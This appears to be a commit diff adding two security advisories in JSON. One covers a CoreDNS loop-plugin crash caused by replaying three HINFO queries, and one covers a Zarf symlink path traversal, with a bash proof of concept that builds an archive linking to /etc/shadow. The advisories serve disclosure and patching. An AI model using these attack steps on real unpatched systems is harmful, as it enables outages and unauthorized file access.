Publish Advisories

GHSA-h75p-j8xm-m278
GHSA-hcm4-6hpj-vghm

Author: advisory-database[bot]

advisories/github-reviewed/2026/03/GHSA-h75p-j8xm-m278/GHSA-h75p-j8xm-m278.json

@@ -0,0 +1,65 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-h75p-j8xm-m278",
+  "modified": "2026-03-06T22:08:22Z",
+  "published": "2026-03-06T22:08:22Z",
+  "aliases": [
+    "CVE-2026-26018"
+  ],
+  "summary": "CoreDNS Loop Detection Denial of Service Vulnerability",
+  "details": "## Executive Summary\n\nA Denial of Service vulnerability exists in CoreDNS's loop detection plugin that allows an attacker to crash the DNS server by sending specially crafted DNS queries. The vulnerability stems from the use of a predictable pseudo-random number generator (PRNG) for generating a secret query name, combined with a fatal error handler that terminates the entire process.\n\n---\n## Technical Details\n\n### Vulnerability Description\n\nThe CoreDNS `loop` plugin is designed to detect forwarding loops by performing a self-test during server startup. The plugin generates a random query name (`qname`) using Go's `math/rand` package and sends an HINFO query to itself. If the server receives multiple matching queries, it assumes a forwarding loop exists and terminates.\n\n**The vulnerability arises from two design flaws:**\n\n1. **Predictable PRNG Seed**: The random number generator is seeded with `time.Now().UnixNano()`, making the generated qname predictable if an attacker knows the approximate server start time.\n\n2. **Fatal Error Handler**: When the plugin detects what it believes is a loop (3+ matching HINFO queries), it calls `log.Fatalf()` which invokes `os.Exit(1)`, immediately terminating the process without cleanup or recovery.\n\n### Affected Code\n\n**File: `plugin/loop/setup.go`**\n```go\n// PRNG seeded with predictable timestamp\nvar r = rand.New(time.Now().UnixNano())\n\n// Qname generation using two consecutive PRNG calls\nfunc qname(zone string) string {\n    l1 := strconv.Itoa(r.Int())\n    l2 := strconv.Itoa(r.Int())\n    return dnsutil.Join(l1, l2, zone)\n}\n```\n\n**File: `plugin/loop/loop.go`**\n```go\nfunc (l *Loop) ServeDNS(ctx context.Context, w dns.ResponseWriter, r *dns.Msg) (int, error) {\n    // ... validation checks ...\n    \n    if state.Name() == l.qname {\n        l.inc()  // Increment counter\n    }\n\n    if l.seen() > 2 {\n        // FATAL: Terminates entire process\n        log.Fatalf(\"Loop (%s -> %s) detected for zone %q...\", ...)\n    }\n    \n    // ...\n}\n```\n\n**File: `plugin/pkg/log/log.go`**\n```go\nfunc Fatalf(format string, v ...any) {\n    logf(fatal, format, v...)\n    os.Exit(1)  // Immediate process termination\n}\n```\n\n### Exploitation Window\n\nThe loop plugin remains active during the following conditions:\n\n| Condition | Window Duration | Attack Feasibility |\n|-----------|-----------------|-------------------|\n| Healthy startup | 2 seconds | Requires precise timing |\n| Self-test failure (upstream unreachable) | 30 seconds | **HIGH** - Extended window |\n| Network degradation | Variable | Depends on retry behavior |\n\n### Attack Scenario\n\n**Primary Attack Vector: Network Degradation**\n\nWhen the upstream DNS server is unreachable (network partition, misconfiguration, outage), the loop plugin's self-test fails repeatedly. During this period:\n\n1. The loop plugin remains active for up to 30 seconds\n2. Each self-test attempt generates an HINFO query visible in CoreDNS logs\n3. An attacker with log access (shared Kubernetes cluster, centralized logging) can observe the qname\n4. The attacker sends 3 HINFO queries with the observed qname\n5. The server immediately crashes\n\n```\n┌──────────────────────────────────────────────────────────────────────────┐\n│                         ATTACK TIMELINE                                  │\n├──────────────────────────────────────────────────────────────────────────┤\n│ T+0s     CoreDNS starts, PRNG seeded with UnixNano()                     │\n│ T+0.5s   Self-test HINFO query sent (visible in logs)                    │\n│ T+2s     Self-test fails (upstream timeout)                              │\n│ T+3s     Retry #1 - counter resets, qname unchanged                      │\n│ T+5s     Retry #2 - attacker observes qname in logs                      │\n│ T+5.1s   ATTACKER: Send HINFO #1 → counter = 1                           │\n│ T+5.2s   ATTACKER: Send HINFO #2 → counter = 2                           │\n│ T+5.3s   ATTACKER: Send HINFO #3 → counter = 3 → os.Exit(1)              │\n│ T+5.3s   SERVER CRASHES                                                  │\n└──────────────────────────────────────────────────────────────────────────┘\n```\n\n---\n\n## Impact Assessment\n\n### Attack Requirements\n\n| Requirement | Notes |\n|-------------|-------|\n| Network Access | Must be able to send UDP packets to CoreDNS port |\n| Log Access | Required to observe the qname (common in shared clusters) |\n| Timing | Extended window during network degradation |\n| Authentication | None required |\n\n### Real-World Impact\n\nCoreDNS is the default DNS server for Kubernetes clusters. A successful attack would:\n\n1. **Disruption**: All DNS resolution fails within the cluster\n2. **Cascading Failures**: Services unable to discover each other\n3. **Restart Loop**: If attack persists, CoreDNS enters crash-restart cycle\n4. **Data Plane Impact**: Application-level failures across the cluster\n\n## References\n\n- CoreDNS GitHub: https://github.com/coredns/coredns\n- Loop Plugin Documentation: https://coredns.io/plugins/loop/\n- Go math/rand Documentation: https://pkg.go.dev/math/rand",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/coredns/coredns"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "1.14.2"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/coredns/coredns/security/advisories/GHSA-h75p-j8xm-m278"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26018"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/coredns/coredns"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/coredns/coredns/releases/tag/v1.14.2"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-337"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-06T22:08:22Z",
+    "nvd_published_at": "2026-03-06T16:16:10Z"
+  }
+}

advisories/github-reviewed/2026/03/GHSA-hcm4-6hpj-vghm/GHSA-hcm4-6hpj-vghm.json

@@ -0,0 +1,65 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-hcm4-6hpj-vghm",
+  "modified": "2026-03-06T22:10:48Z",
+  "published": "2026-03-06T22:10:48Z",
+  "aliases": [
+    "CVE-2026-29064"
+  ],
+  "summary": "Zarf's symlink targets in archives are not validated against destination directory",
+  "details": "### Summary\n\nA path traversal vulnerability in archive extraction allows a specifically crafted Zarf package to create symlinks pointing outside the destination directory, enabling arbitrary file read or write on the system processing the package.\n\n### What users should do\nUpgrade immediately to version v0.73.1\n\nIf developers cannot upgrade immediately, only process Zarf packages from fully trusted sources until the fix is applied.\n\nIf using trusted packages and archives - the only impact to this is updating zarf binary or SDK package versions. Previously created packages do not need to be rebuilt.\n\n### Who is affected\n\n- Any user of affected Zarf versions who processes packages from untrusted or semi-trusted sources. This includes packages received via file transfer, downloaded from registries, or shared across organizational boundaries. This includes use of the `zarf tools archiver decompress` functionality on generic archives.\n\n- Any SDK consumers of Zarf for the affected versions who utilize package load or archive operations. \n\n### What is the risk\n\nA malicious Zarf package or archive could create symlinks pointing to arbitrary locations on the filesystem. This could lead to unauthorized file reads, file overwrites, or in some scenarios, code execution on the system performing the extraction in the event a file on the system is both overwritten and executed. This vulnerability does not introduce an execution path explicitly.\n\n### Mitigating Factors\n\nIf developers only process trusted packages and/or trusted archives (with `zarf tools archiver decompress), the risk is low. \n\n### Details\n\nThe archive extraction code in src/pkg/archive/archive.go creates symlinks from archive entries without validating that the symlink target resolves within the extraction destination directory. This affects all three extraction handler functions:\n\n1. defaultHandler (on line 320): Joins `dst` with `f.LinkTarget`, but does not verify the resolved path stays under `dst`. This means that a LinkTarget of `\"../../../../etc/shadow\"` would resolve outside the destination after `filepath.Join`.\n2. stripHandler (on line 342): Passes `f.LinkTarget` verbatim to `os.Symlink`.\n3. filterHandler (on line 370): Similar to `defaultHandler`, the code joins but does not validate the `LinkTarget`.\n\nThe vulnerability is a symlink variant of the \"Zip Slip\" class (CVE-2018-1002200). An attacker constructs a Zarf package containing an archive entry with a malicious `f.LinkTarget`. When the package is extracted, `os.Symlink` creates a symlink pointing outside the extraction root. A subsequent archive entry targeting the same name can then read or write through the symlink to an arbitrary location on the filesystem.\n\n### PoC\n\n<details>\n<summary>Proof of Concept</summary>\nYou may want to follow through these steps inside of a disposable environment (container, VM):\n\n```bash\nReproduction via zarf tools archiver decompress (simplest)\n\nThis demonstrates the vulnerability using the defaultHandler (line 320).\n\n# 1. Create a staging directory for the malicious archive contents.\nmkdir -p /tmp/cve-repro/archive-contents\n\n# 2. Create a symlink that traverses out of the extraction directory.\n#    This symlink targets \"../../../../../../../etc/shadow\" relative to\n#    whatever extraction destination is chosen.\ncd /tmp/cve-repro/archive-contents\nln -s ../../../../../../../etc/shadow escape-link\n\n# 3. Also create a regular file so the archive isn't empty besides the link.\necho \"benign content\" > readme.txt\n\n# 4. Package into a tar.gz archive.\n#    The --dereference flag is NOT used, so the symlink is stored as-is.\ncd /tmp/cve-repro\ntar -czf malicious.tar.gz -C archive-contents .\n\n# 5. Verify the archive contains the symlink.\ntar -tvf malicious.tar.gz\n# Expected output includes:\n#   lrwxrwxrwx ... ./escape-link -> ../../../../../../../etc/shadow\n\n# 6. Create the extraction destination (deeply nested so the traversal\n#    resolves to a real path).\nmkdir -p /tmp/cve-repro/extract/a/b/c/d\n\n# 7. Run the vulnerable extraction.\nzarf tools archiver decompress malicious.tar.gz /tmp/cve-repro/extract/a/b/c/d\n\n# 8. Verify the symlink was created pointing outside the destination.\nls -la /tmp/cve-repro/extract/a/b/c/d/escape-link\n# Expected: escape-link /etc/shadow\n#\n# The symlink target resolves to /etc/shadow, which is OUTSIDE\n# the extraction directory /tmp/cve-repro/extract/a/b/c/d/.\n\nreadlink -f /tmp/cve-repro/extract/a/b/c/d/escape-link\n# Expected: /etc/shadow\n\nWhat happened: defaultHandler (line 320) executed:\nos.Symlink(filepath.Join(dst, f.LinkTarget), target)\n// = os.Symlink(\"/tmp/cve-repro/extract/a/b/c/d/../../../../../../../etc/shadow\",\n//              \"/tmp/cve-repro/extract/a/b/c/d/escape-link\")\nfilepath.Join cleans the path to /etc/shadow, which is outside dst. No validation is performed.\n```\n</details>",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/zarf-dev/zarf/src/pkg/archive"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0.54.0"
+            },
+            {
+              "fixed": "0.73.1"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/zarf-dev/zarf/security/advisories/GHSA-hcm4-6hpj-vghm"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29064"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/zarf-dev/zarf"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/zarf-dev/zarf/releases/tag/v0.73.1"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-22"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-06T22:10:48Z",
+    "nvd_published_at": "2026-03-06T17:16:34Z"
+  }
+}